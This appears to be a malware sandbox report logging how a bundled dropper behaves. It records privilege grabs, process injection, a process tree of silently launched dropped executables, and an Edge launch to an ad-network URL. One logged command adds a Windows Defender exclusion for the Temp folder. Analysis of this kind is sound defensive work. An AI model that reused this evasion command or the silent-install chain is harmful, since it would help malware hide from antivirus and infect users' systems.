2fRUngdME9bOU9FVYsq4kr39.exe Token: SeLockMemoryPrivilege 5004 2fRUngdME9bOU9FVYsq4kr39.exe Token: SeIncreaseQuotaPrivilege 5004 2fRUngdME9bOU9FVYsq4kr39.exe Token: SeMachineAccountPrivilege 5004 2fRUngdME9bOU9FVYsq4kr39.exe Token: SeTcbPrivilege 5004 2fRUngdME9bOU9FVYsq4kr39.exe Token: SeSecurityPrivilege 5004 2fRUngdME9bOU9FVYsq4kr39.exe Token: SeTakeOwnershipPrivilege 5004 2fRUngdME9bOU9FVYsq4kr39.exe Token: SeLoadDriverPrivilege 5004 2fRUngdME9bOU9FVYsq4kr39.exe Token: SeSystemProfilePrivilege 5004 2fRUngdME9bOU9FVYsq4kr39.exe Token: SeSystemtimePrivilege 5004 2fRUngdME9bOU9FVYsq4kr39.exe Token: SeProfSingleProcessPrivilege 5004 2fRUngdME9bOU9FVYsq4kr39.exe Token: SeIncBasePriorityPrivilege 5004 2fRUngdME9bOU9FVYsq4kr39.exe Token: SeCreatePagefilePrivilege 5004 2fRUngdME9bOU9FVYsq4kr39.exe Token: SeCreatePermanentPrivilege 5004 2fRUngdME9bOU9FVYsq4kr39.exe Token: SeBackupPrivilege 5004 2fRUngdME9bOU9FVYsq4kr39.exe Token: SeRestorePrivilege 5004 2fRUngdME9bOU9FVYsq4kr39.exe Token: SeShutdownPrivilege 5004 2fRUngdME9bOU9FVYsq4kr39.exe Token: SeDebugPrivilege 5004 2fRUngdME9bOU9FVYsq4kr39.exe -
Suspicious use of FindShellTrayWindow 7 IoCs
pid Process 5920 ultramediaburner.tmp 680 msedge.exe 5416 IDownload.tmp 4500 installer.exe 2956 IDownload.App.exe 2956 IDownload.App.exe 2956 IDownload.App.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 2956 IDownload.App.exe 2956 IDownload.App.exe 2956 IDownload.App.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 5076 cmd.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3224 wrote to memory of 3988 3224 setup_x86_x64_install.exe 77 PID 3224 wrote to memory of 3988 3224 setup_x86_x64_install.exe 77 PID 3224 wrote to memory of 3988 3224 setup_x86_x64_install.exe 77 PID 3988 wrote to memory of 4776 3988 setup_installer.exe 78 PID 3988 wrote to memory of 4776 3988 setup_installer.exe 78 PID 3988 wrote to memory of 4776 3988 setup_installer.exe 78 PID 4776 wrote to memory of 4668 4776 setup_install.exe 82 PID 4776 wrote to memory of 4668 4776 setup_install.exe 82 PID 4776 wrote to memory of 4668 4776 setup_install.exe 82 PID 4776 wrote to memory of 4652 4776 setup_install.exe 83 PID 4776 wrote to memory of 4652 4776 setup_install.exe 83 PID 4776 wrote to memory of 4652 4776 setup_install.exe 83 PID 4776 wrote to memory of 4104 4776 setup_install.exe 84 PID 4776 wrote to memory of 4104 4776 setup_install.exe 84 PID 4776 wrote to memory of 4104 4776 setup_install.exe 84 PID 4776 wrote to memory of 4724 4776 setup_install.exe 85 PID 4776 wrote to memory of 4724 4776 setup_install.exe 85 PID 4776 wrote to memory of 4724 4776 setup_install.exe 85 PID 4776 wrote to memory of 4824 4776 setup_install.exe 113 PID 4776 wrote to memory of 4824 4776 setup_install.exe 113 PID 4776 wrote to memory of 4824 4776 setup_install.exe 113 PID 4776 wrote to memory of 4840 4776 setup_install.exe 86 PID 4776 wrote to memory of 4840 4776 setup_install.exe 86 PID 4776 wrote to memory of 4840 4776 setup_install.exe 86 PID 4776 wrote to memory of 4796 4776 setup_install.exe 87 PID 4776 wrote to memory of 4796 4776 setup_install.exe 87 PID 4776 wrote to memory of 4796 4776 setup_install.exe 87 PID 4776 wrote to memory of 3036 4776 setup_install.exe 112 PID 4776 wrote to memory of 3036 4776 setup_install.exe 112 PID 4776 wrote to memory of 3036 4776 setup_install.exe 112 PID 4776 wrote to memory of 2228 4776 setup_install.exe 111 PID 4776 wrote to memory of 2228 4776 setup_install.exe 111 PID 4776 wrote to memory of 2228 4776 setup_install.exe 111 PID 4776 wrote to memory of 1632 4776 setup_install.exe 109 PID 4776 wrote to memory of 1632 4776 setup_install.exe 109 PID 4776 wrote to memory of 1632 4776 setup_install.exe 109 PID 4104 wrote to memory of 4388 4104 cmd.exe 110 PID 4104 wrote to memory of 4388 4104 cmd.exe 110 PID 4652 wrote to memory of 4940 4652 cmd.exe 108 PID 4652 wrote to memory of 4940 4652 cmd.exe 108 PID 4652 wrote to memory of 4940 4652 cmd.exe 108 PID 4668 wrote to memory of 3540 4668 cmd.exe 107 PID 4668 wrote to memory of 3540 4668 cmd.exe 107 PID 4668 wrote to memory of 3540 4668 cmd.exe 107 PID 4776 wrote to memory of 4540 4776 setup_install.exe 106 PID 4776 wrote to memory of 4540 4776 setup_install.exe 106 PID 4776 wrote to memory of 4540 4776 setup_install.exe 106 PID 4724 wrote to memory of 4548 4724 cmd.exe 105 PID 4724 wrote to memory of 4548 4724 cmd.exe 105 PID 4776 wrote to memory of 2496 4776 setup_install.exe 104 PID 4776 wrote to memory of 2496 4776 setup_install.exe 104 PID 4776 wrote to memory of 2496 4776 setup_install.exe 104 PID 4776 wrote to memory of 4272 4776 setup_install.exe 88 PID 4776 wrote to memory of 4272 4776 setup_install.exe 88 PID 4776 wrote to memory of 4272 4776 setup_install.exe 88 PID 4840 wrote to memory of 4848 4840 cmd.exe 103 PID 4840 wrote to memory of 4848 4840 cmd.exe 103 PID 4840 wrote to memory of 4848 4840 cmd.exe 103 PID 4796 wrote to memory of 4704 4796 cmd.exe 102 PID 4796 wrote to memory of 4704 4796 cmd.exe 102 PID 4796 wrote to memory of 4704 4796 cmd.exe 102 PID 4824 wrote to memory of 4692 4824 rundll32.exe 133 PID 4824 wrote to memory of 4692 4824 rundll32.exe 133 PID 4824 wrote to memory of 4692 4824 rundll32.exe 133
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3224 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3988 -
C:\Users\Admin\AppData\Local\Temp\7zS49F846A0\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS49F846A0\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4776 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:4668 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3540
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu20c467678e2c.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4652 -
C:\Users\Admin\AppData\Local\Temp\7zS49F846A0\Thu20c467678e2c.exeThu20c467678e2c.exe5⤵
- Executes dropped EXE
PID:4940 -
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5908 -
C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"7⤵PID:3644
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3644 -s 3088⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2800
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"6⤵
- Executes dropped EXE
PID:4552 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4552 -s 6127⤵
- Program crash
PID:4804
-
-
-
C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"C:\Users\Admin\AppData\Local\Temp\BearVpn 3.exe"6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5292
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu20f2cf5e0c.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4104 -
C:\Users\Admin\AppData\Local\Temp\7zS49F846A0\Thu20f2cf5e0c.exeThu20f2cf5e0c.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4388 -
C:\Users\Admin\AppData\Roaming\7705280.scr"C:\Users\Admin\AppData\Roaming\7705280.scr" /S6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4968 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4968 -s 21207⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6376
-
-
-
C:\Users\Admin\AppData\Roaming\6431686.scr"C:\Users\Admin\AppData\Roaming\6431686.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6036
-
-
C:\Users\Admin\AppData\Roaming\8578069.scr"C:\Users\Admin\AppData\Roaming\8578069.scr" /S6⤵
- Executes dropped EXE
PID:3964
-
-
C:\Users\Admin\AppData\Roaming\8360295.scr"C:\Users\Admin\AppData\Roaming\8360295.scr" /S6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5452
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu20dae7c52bc0856.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4724 -
C:\Users\Admin\AppData\Local\Temp\7zS49F846A0\Thu20dae7c52bc0856.exeThu20dae7c52bc0856.exe5⤵
- Executes dropped EXE
PID:4548
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2026c04e7218e1.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4840 -
C:\Users\Admin\AppData\Local\Temp\7zS49F846A0\Thu2026c04e7218e1.exeThu2026c04e7218e1.exe5⤵
- Executes dropped EXE
PID:4848
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu203b503b429e68.exe4⤵
- Suspicious use of WriteProcessMemory
PID:4796 -
C:\Users\Admin\AppData\Local\Temp\7zS49F846A0\Thu203b503b429e68.exeThu203b503b429e68.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4704 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4704 -s 18966⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:3300
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu203cdb52ef3c6580d.exe4⤵PID:4272
-
C:\Users\Admin\AppData\Local\Temp\7zS49F846A0\Thu203cdb52ef3c6580d.exeThu203cdb52ef3c6580d.exe5⤵
- Executes dropped EXE
PID:5380 -
C:\Users\Admin\AppData\Local\Temp\7zS49F846A0\Thu203cdb52ef3c6580d.exeC:\Users\Admin\AppData\Local\Temp\7zS49F846A0\Thu203cdb52ef3c6580d.exe6⤵
- Executes dropped EXE
PID:5820
-
-
C:\Users\Admin\AppData\Local\Temp\7zS49F846A0\Thu203cdb52ef3c6580d.exeC:\Users\Admin\AppData\Local\Temp\7zS49F846A0\Thu203cdb52ef3c6580d.exe6⤵
- Executes dropped EXE
PID:1292
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu20fdd9ac35a68.exe4⤵PID:2496
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu20bc9ea26f.exe4⤵PID:4540
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2025d6674aed72ba.exe /mixone4⤵PID:1632
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2090b5515d63b2.exe4⤵PID:2228
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu2094524d5e5b.exe4⤵PID:3036
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Thu20a5f7ccaa78.exe4⤵PID:4824
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-6M5EV.tmp\Thu2026c04e7218e1.tmp"C:\Users\Admin\AppData\Local\Temp\is-6M5EV.tmp\Thu2026c04e7218e1.tmp" /SL5="$30162,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS49F846A0\Thu2026c04e7218e1.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
PID:5148 -
C:\Users\Admin\AppData\Local\Temp\is-4CIUI.tmp\___YHDG34.exe"C:\Users\Admin\AppData\Local\Temp\is-4CIUI.tmp\___YHDG34.exe" /S /UID=burnerch22⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
PID:5872 -
C:\Program Files\Windows Defender Advanced Threat Protection\QJPHFRVIAM\ultramediaburner.exe"C:\Program Files\Windows Defender Advanced Threat Protection\QJPHFRVIAM\ultramediaburner.exe" /VERYSILENT3⤵PID:1276
-
C:\Users\Admin\AppData\Local\Temp\is-C3OH2.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-C3OH2.tmp\ultramediaburner.tmp" /SL5="$302CA,281924,62464,C:\Program Files\Windows Defender Advanced Threat Protection\QJPHFRVIAM\ultramediaburner.exe" /VERYSILENT4⤵
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:5920 -
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu5⤵PID:1036
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\93-7aea8-d91-fcfa6-ce580d3c324a4\Sevaqipefy.exe"C:\Users\Admin\AppData\Local\Temp\93-7aea8-d91-fcfa6-ce580d3c324a4\Sevaqipefy.exe"3⤵PID:5468
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kjtuforq.o1h\GcleanerEU.exe /eufive & exit4⤵PID:5500
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵PID:3972
-
-
C:\Users\Admin\AppData\Local\Temp\kjtuforq.o1h\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\kjtuforq.o1h\GcleanerEU.exe /eufive5⤵PID:1312
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1312 -s 3046⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2760
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bbesc0wr.l22\installer.exe /qn CAMPAIGN="654" & exit4⤵PID:6868
-
C:\Users\Admin\AppData\Local\Temp\bbesc0wr.l22\installer.exeC:\Users\Admin\AppData\Local\Temp\bbesc0wr.l22\installer.exe /qn CAMPAIGN="654"5⤵
- Loads dropped DLL
- Enumerates connected drives
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:4500 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\bbesc0wr.l22\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\bbesc0wr.l22\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1631855242 /qn CAMPAIGN=""654"" " CAMPAIGN="654"6⤵
- Enumerates connected drives
PID:11736
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\4ehcirbg.4gd\anyname.exe & exit4⤵PID:2140
-
C:\Users\Admin\AppData\Local\Temp\4ehcirbg.4gd\anyname.exeC:\Users\Admin\AppData\Local\Temp\4ehcirbg.4gd\anyname.exe5⤵PID:2156
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\h1dpgotg.zvb\gcleaner.exe /mixfive & exit4⤵PID:6124
-
C:\Users\Admin\AppData\Local\Temp\h1dpgotg.zvb\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\h1dpgotg.zvb\gcleaner.exe /mixfive5⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:5140 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5140 -s 3086⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6768
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mteh22k0.z2x\autosubplayer.exe /S & exit4⤵
- Suspicious use of SetWindowsHookEx
PID:5076
-
-
-
C:\Users\Admin\AppData\Local\Temp\6c-d19a8-bce-1b4b0-c7a8cf813cff4\Xusaewikoxe.exe"C:\Users\Admin\AppData\Local\Temp\6c-d19a8-bce-1b4b0-c7a8cf813cff4\Xusaewikoxe.exe"3⤵PID:6596
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e64⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious use of FindShellTrayWindow
PID:680 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffd3a1446f8,0x7ffd3a144708,0x7ffd3a1447185⤵PID:568
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 /prefetch:35⤵PID:6632
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:25⤵PID:5816
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2796 /prefetch:85⤵PID:6724
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3264 /prefetch:15⤵PID:4272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3272 /prefetch:15⤵PID:3704
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4920 /prefetch:15⤵PID:6540
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5268 /prefetch:15⤵PID:5504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4452 /prefetch:15⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:6164
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5592 /prefetch:85⤵PID:6372
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5592 /prefetch:85⤵PID:17276
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4312 /prefetch:15⤵PID:11596
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4564 /prefetch:15⤵PID:11952
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:15⤵PID:5184
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5648 /prefetch:25⤵PID:8312
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5896 /prefetch:85⤵PID:14464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5856 /prefetch:15⤵PID:15036
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4828 /prefetch:15⤵PID:14840
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5496 /prefetch:15⤵PID:15504
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4428 /prefetch:85⤵PID:16092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3120 /prefetch:15⤵PID:16344
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4524 /prefetch:15⤵PID:16356
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=6244 /prefetch:85⤵PID:5644
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2060,4979366431149005744,5418940169112441998,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6176 /prefetch:15⤵PID:16808
-
-
